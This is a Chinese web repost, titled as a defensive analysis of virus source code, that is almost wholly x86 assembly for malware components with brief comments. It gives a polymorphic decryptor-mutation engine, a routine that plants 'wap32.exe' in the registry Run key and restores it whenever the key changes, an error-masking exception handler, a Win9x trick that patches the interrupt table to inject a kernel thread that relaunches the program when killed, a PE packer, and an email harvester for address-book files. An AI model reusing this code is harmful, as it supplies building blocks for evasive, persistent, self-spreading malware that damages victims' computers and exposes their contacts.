首页 > 编程 > Java > 正文

病毒源码解析之防御分析

2019-09-06 23:33:18
字体:
来源:转载
供稿:网友
1、超级病毒变形引擎

此段代码会在DATA段内生成一个解密代码。

.586p
.model flat,STDCALL
extrn ExitProcess: proc
VirusSize=100h
.data

DecodeMethod dd ?
DeCode:
pushad
call Encode
db 100h dup(11h)
Encode:
db 100h dup(0cch)
RndReg0 dd 0 ;eax
RndReg1 dd 0 ;ebx
RndCode dd 0 ;Rnd Code
RndMima dd 60932561 ;Rnd Password

.code
@@Start:
mov eax,RndMima
ror eax,7
mov RndCode,eax

mov eax,RndCode
mov ecx,eax
and eax,011b
mov RndReg0,eax
xor ecx,RndMima
and ecx,011b
cmp eax,ecx
jnz short ChooseRegOk
inc ecx
and ecx,011b
ChooseRegOk:
mov RndReg1,ecx


mov edi,offset Encode

ror RndCode,1
call GetBxCode,0,RndReg0,RndCode
mov esi,eax
ContFillStep0:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep0
dec edi

ror RndCode,1
call GetBxCode,1,RndReg1,RndCode
mov esi,eax
ContFillStep1:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep1
dec edi

mov ebx,edi ;//计算机Jmp指令用

ror RndCode,1
call GetBxCode,2,RndReg0,RndCode
mov esi,eax
ContFillStep2:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep2
dec edi

mov eax,RndMima
mov [edi-4],eax ;//填写随机密码
mov eax,RndCode
and eax,01
mov DecodeMethod,eax ;//填写DeCode方法

ror RndCode,1
call GetBxCode,3,RndReg0,RndCode
mov esi,eax
ContFillStep3:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep3
dec edi

ror RndCode,1
call GetBxCode,4,RndReg1,RndCode
mov esi,eax
ContFillStep4:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep4
dec edi

ror RndCode,1
call GetBxCode,5,RndReg0,RndCode
mov esi,eax
ContFillStep5:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep5
dec edi

mov al,0c3h
mov [edi],al ;//填写Ret指令

sub ebx,edi
mov [edi-1],bl ;//填写jmp指令

int 3;

jmp DeCode
ret
GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
call GetBxCodeAddr
Step0_Eax:
mov eax,[esp]
int 3;
pop eax
push eax
int 3;
Step0_Ebx:
pop ebx
push ebx
int 3;
push dword ptr[esp]
pop ebx
int 3;
Step0_Ecx:
mov ecx,[esp]
int 3;
pop ecx
push ecx
int 3;
Step0_Edx:
mov edx,[esp]
int 3;
mov edx,esp
mov edx,[edx]
int 3

Step1_Eax:
mov eax,VirusSize
int 3
sub eax,eax
add ax,VirusSize+3081h
sub ax,3081h
int 3
Step1_Ebx:
mov ebx,VirusSize
int 3;
xor ebx,ebx
or bx,VirusSize
int 3;
Step1_Ecx:
sub ecx,ecx
xor ecx,(VirusSize xor 3181h)
xor ecx,(3181h)
int 3;
mov ecx,0
and cx,VirusSize
int 3
Step1_Edx:
and edx,0
xor dx,(VirusSize-0281h)
add dx,0281h
int 3;
xor edx,edx
sub edx,(0181h-VirusSize)
sub edx,-0181h
int 3;

Setp2_Eax:
xor [eax],12345678h
int 3
add [eax],12345678h
int 3
Setp2_Ebx:
xor [ebx],12345678h
int 3;
add [ebx],12345678h
int 3;

Setp2_Ecx:
xor [ecx],12345678h
int 3;
add [ecx],12345678h
int 3;
Setp2_Edx:
xor [edx],12345678h
int 3;
add [edx],12345678h
int 3;
Step3_Eax:
add eax,4
int 3
inc eax
inc eax
inc eax
inc eax
int 3;
Step3_Ebx:
add ebx,5
dec ebx
int 3
add ebx,2
add ebx,2
int 3;
Step3_Ecx:
sub ecx,-4
int 3
sub ecx,-5
dec ecx
int 3;
Step3_Edx:
inc edx
sub edx,-3
int 3
add edx,04
int 3;

Step4_Eax:
sub eax,4
int 3
dec eax
dec eax
dec eax
sub eax,1
int 3;
Step4_Ebx:
dec ebx
sub ebx,3
int 3;
dec ebx
dec ebx
sub ebx,2
int 3;
Step4_Ecx:
add cx,123
sub cx,123+4
int 3
sub cx,-4
dec cx
sub cx,7
int 3
Step4_Edx:
sub dx,2
dec dx
sub dx,1
int 3
inc edx
sub dx,5
int 3;
Step5_Eax:
jnz $
int 3
ja $
int 3
Step5_Ebx:
jg $
int 3
jnb $
int 3
Step5_Ecx:
jnl $
int 3
jnz $
int 3
Step5_Edx:
ja $
int 3
jg $
int 3

GetBxCodeAddr:
pop esi
mov al,0cch ;//指令分割符
mov ecx,Step
shl ecx,1
shl ecx,1
add ecx,Reg ;//计算机得到的指令位置
shl ecx,1
and Rnd,01b
add ecx,Rnd
jcxz short GetBxCodeOver
ContFindCode:
push ecx
ContFindCC:
inc esi
cmp [esi],al
jnz ContFindCC
pop ecx
loop ContFindCode
mov eax,esi
inc eax
ret
GetBxCodeOver:
mov eax,esi
ret
GetBxCode endp


end @@Start


2、Windows 9x/2000/xp 琐定注册表

.586p
.model flat,STDCALL
.data

HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
ValueName db 'wap32',0
PathName db 'wap32.exe',0

.code

extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn ExitProcess: proc
extrn RegNotifyChangeKeyValue: proc
extrn CreateThread: proc
extrn Sleep: proc
extrn RegQueryValueExA: proc

start:
push eax
call RegOpenKeyA,080000002h,offset HKeyStr,esp
pop ebx
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

sub esp,100h
mov eax,esp
push 100h
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
pop eax
add esp,100h

push eax
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
pop eax
call Sleep,1000*60*3
ret

RegProtectProc proc hKey:dword
mov ebx,hKey
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'wap32',0
GetProtectKeyName:
pop esi
push 100h
call RegQueryValueExA,ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call RegNotifyChangeKeyValue,ebx,0,4,0,0
call RegSetValueExA,ebx,esi,0,01,edi,100h
jmp short WaitRegChangeNotify
RegProtectProc endp

end start



3、 Windows 9x/2000 意外处理通用程序


此段程序可以达到屏蔽程序错误的效果

include wap32.inc

.386p
.model flat,stdcall

extrn MessageBoxA: proc
extrn ExitProcess: proc

.data

Msg db 'Fuck',0

SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetEspAddr
push D [edx] ;保存原Esp地址值
mov [edx],esp
jmp eax
ClearSehFrame:
pop eax ;弹出返回地址
call GetEspAddr
mov esp,[edx]
pop D [edx] ;恢复原Esp地址值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax

Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame
jmp ecx
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp

GetEspAddr:
call PushOffsetEspAddr
dd ?
PushOffsetEspAddr:
pop edx
ret


.code

Start:
call PushErrorProc
call MessageBoxA,0,offset Msg,offset Msg,0
ret
PushErrorProc:
pop ecx
call SetSehFrame
mov ds:[0],eax
call ClearSehFrame
ret


end Start



4、Windows 9x 下进程不死术

此段程序首先实现Win9x下注射远程线程(新技术)
然后与Win2k下进程不死术一样了。
include Win32.inc

.386p
.model flat,stdcall

extrn GetProcAddress: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
extrn GetCurrentProcessId: proc
extrn OpenProcess: proc
extrn GetCurrentProcess: proc
extrn WriteProcessMemory: proc
extrn GetExitCodeProcess: proc

.data

;问题,要Sleep()这样做使Kernel32有机会更新数据
KnlThread proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
KnlThread endp

FileName db 'c:wap32.exe',0

KnlOpenProcessStr db 'OpenProcess',0
KnlWaitForObjectStr db 'WaitForSingleObject',0
KnlWinExecStr db 'WinExec',0
KnlSleepStr db 'Sleep',0
KnlCreateKnlThreadStr db 'CreateKernelThread',0

.code

Start:
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,0bff70000h,offset KnlWinExecStr
mov KnlWinExec,eax

call MoveDataToKnl,offset Start,0bff70600h,100h

call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
mov ebx,eax
call GetCurrentProcessId
push eax
call ebx,0,0,0bff70000h+600h,eax,0,esp
pop eax
call MessageBoxA,0,offset FileName,offset FileName,0
ret

MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
push eax
sidt [esp-2]
pop eax
add eax,3*8
mov ebx,[eax]
mov edx,[eax+4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax+4],edx
cld
rep movsb
popad
iret
SetIdt03:
cli
pop W[eax]
pop W[eax+6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3;
sti
ret
MoveDataToKnl endp

end Start


5、简单算法,高效率压缩PE文件

.586p
.model flat,STDCALL
.data

OldFile db 'pe.exe',0
NewFile db 'pe.zzz',0

FileData db 0,0
.code
extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _lclose: proc
extrn ExitProcess: proc
start:
call _lopen,offset OldFile,0
cmp eax,-1
jz ExitProc
mov esi,eax
call _lcreat,offset NewFile,0
cmp eax,-1
jz CloseOldFile
mov edi,eax

xor ebx,ebx
ReadData:
call _lread,esi,offset FileData,1
or eax,eax
jz short ReadOver
movzx eax,FileData
or eax,eax
jnz short NoZero
inc ebx
cmp ebx,0ffh
jnz short ReadData
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
jmp short ReadData
NoZero:
or ebx,ebx
jnz short NoZeroData
call _lwrite,edi,offset FileData,1
jmp short ReadData
NoZeroData:
push eax
xor eax,eax
mov ah,bl
mov word ptr FileData,ax
call _lwrite,edi,offset FileData,2
xor ebx,ebx
pop eax
mov FileData,al
call _lwrite,edi,offset FileData,1
jmp ReadData
ReadOver:
or ebx,ebx
jz short CloseFile
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
CloseFile:
call _lclose,edi
CloseOldFile:
call _lclose,esi
ExitProc:
call ExitProcess,0

end start

6、提取Windows地址薄文件(*.WAB)的Email信息

.586p
.model flat,STDCALL
.data

MailFile db 'My.WAB',0

.code

extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _llseek: proc
extrn _lclose: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn WideCharToMultiByte: proc

start:
call _lopen,offset MailFile,0
cmp eax,-1
jz short ExitProc
mov ebx,eax
sub esp,100h
mov edi,esp
call _lread,ebx,edi,100h
cmp eax,100h
jnz short CloseFile
mov eax,[edi+60h] ;得到Unicode邮件名偏移
call _llseek,ebx,eax,0
mov ecx,[edi+64h] ;得到Unicode邮件名个数
ContWabMail:
push ecx
call _lread,ebx,edi,44h ;读一个记录
cmp eax,44
sub esp,100h
mov eax,esp
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
mov eax,esp
call MessageBoxA,0,eax,eax,0
add esp,100h
pop ecx
loop short ContWabMail
CloseFile:
call _lclose,ebx
ExitProc:
call ExitProcess,0

end start



WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forum/
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表